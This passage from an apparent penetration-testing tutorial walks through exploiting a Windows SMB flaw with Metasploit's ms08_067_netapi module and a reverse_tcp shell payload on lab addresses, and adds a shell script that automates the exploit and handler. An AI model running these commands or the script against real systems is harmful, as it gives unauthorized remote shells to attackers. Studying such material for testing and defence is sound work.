<table border="0" cellpadding="0" cellspacing="0" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 669px;"><tbody style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="gutter" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; color: rgb(175, 175, 175) !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: 
auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
1</div>
</td><td class="code" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 639px;"><div class="container" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: relative !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">msf > set RHOST 192.168.40.132</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW7.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW7.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
With the exploit selected and its target option set, the next step is to choose a payload: the code that runs on the target once exploitation succeeds, here a reverse shell. The payloads compatible with the selected exploit are listed with:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_264690" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
<table border="0" cellpadding="0" cellspacing="0" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 669px;"><tbody style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="gutter" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; color: rgb(175, 175, 175) !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: 
auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
1</div>
</td><td class="code" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 639px;"><div class="container" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: relative !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">msf > show payloads</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Because the goal is a command shell on the remote machine, pick the <em>reverse_tcp</em> shell payload, which makes the target connect back to the attacker rather than opening a listening port on the target, and select it as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_728036" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
<table border="0" cellpadding="0" cellspacing="0" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 669px;"><tbody style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="gutter" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; color: rgb(175, 175, 175) !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: 
auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
1</div>
</td><td class="code" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 639px;"><div class="container" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: relative !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">msf > set payload windows/shell/reverse_tcp</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
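<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The console steps above (select the exploit, set RHOST, choose the payload), together with the LHOST setting described next, can be replayed as a single Metasploit resource script instead of being typed one line at a time. The following is an added example and not code from the original article: it validates the addresses and port, writes the resource script, runs the module's own <em>check</em> before launching, and backgrounds the exploit with <em>exploit -j</em> so the console stays usable while the handler waits for the connect-back. The attacker address 192.168.40.128, port 4444 and the file path /tmp/ms08_067.rc are assumptions for illustration; RHOST is kept as on this page, with newer releases treating it as an alias of RHOSTS.</div>

```shell
#!/bin/sh
# Added example, not from the original article: build a Metasploit resource
# script (.rc) reproducing the msfconsole steps on this page, then replay it
# with `msfconsole -q -r <file>`.
# Assumed values (not from the page): LHOST 192.168.40.128, LPORT 4444,
# output path /tmp/ms08_067.rc.

# Return 0 if $1 is a dotted-quad IPv4 address with every octet in 0..255.
valid_ipv4() {
  case $1 in
    *[!0-9.]*|''|.*|*.|*..*) return 1;;   # non-digits, empty, stray dots
  esac
  rest=$1 n=0
  while [ -n "$rest" ]; do
    octet=${rest%%.*}                      # leading octet
    [ "$octet" -le 255 ] || return 1
    n=$((n + 1))
    [ "$rest" = "$octet" ] && rest= || rest=${rest#*.}
  done
  [ "$n" -eq 4 ]
}

# Print the resource script for target RHOST, listener LHOST and LPORT.
# `check` asks the module whether the target looks vulnerable before any
# exploitation; `exploit -j` runs the exploit (and its handler) as a job.
build_rc() {
  rhost=$1; lhost=$2; lport=${3:-4444}
  valid_ipv4 "$rhost" || { echo "bad RHOST: $rhost" >&2; return 1; }
  valid_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
  case $lport in ''|*[!0-9]*) echo "bad LPORT: $lport" >&2; return 1;; esac
  [ "$lport" -ge 1 ] && [ "$lport" -le 65535 ] || { echo "bad LPORT: $lport" >&2; return 1; }
  cat <<EOF
use exploit/windows/smb/ms08_067_netapi
set RHOST $rhost
set PAYLOAD windows/shell/reverse_tcp
set LHOST $lhost
set LPORT $lport
check
exploit -j
EOF
}

# Write the script to a file and hand it to msfconsole when it is installed;
# otherwise just leave the file for manual use.
run_rc() {
  rcfile=${RCFILE:-/tmp/ms08_067.rc}
  build_rc "$@" > "$rcfile" || return 1
  if command -v msfconsole >/dev/null 2>&1; then
    msfconsole -q -r "$rcfile"
  else
    echo "msfconsole not found; resource script written to $rcfile" >&2
  fi
}

# Stand-alone use: sh this_script.sh <RHOST> <LHOST> [LPORT]
if [ $# -ge 2 ]; then
  run_rc "$@"
fi
```

<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Two points worth keeping in mind when using a script like this: LHOST must be an address the target can actually reach (the reverse_tcp payload connects from the target to LHOST:LPORT, so a NAT or host-only adapter address that the target cannot route to yields no session), and <em>windows/shell/reverse_tcp</em> is a staged payload, so the handler started by <em>exploit -j</em> must still be running when the target connects back to receive the second stage.</div>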
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The payload has options of its own. LHOST is the attacker's IP address, the one the target will connect back to once the exploit fires, so it must be reachable from the target. Set it as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_317457" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
<table border="0" cellpadding="0" cellspacing="0" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 669px;"><tbody style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="gutter" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; color: rgb(175, 175, 175) !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: 
auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
1</div>
</td><td class="code" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 639px;"><div class="container" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: relative !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">msf > set LHOST 192.168.40.129</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW8.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW8.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Everything needed so far, RHOST, LHOST and the automatic target, is now configured, so it is time to check whether this exploit would penetrate the target computer. We can confirm the vulnerable status using the <em>check</em> command as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW9.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW9.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
This command reports that the SMB check succeeded and that the target computer is vulnerable. Finally, launch the exploit using this command:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_854419" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
<table border="0" cellpadding="0" cellspacing="0" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 669px;"><tbody style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="gutter" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; color: rgb(175, 175, 175) !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: 
auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
1</div>
</td><td class="code" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 639px;"><div class="container" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: relative !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
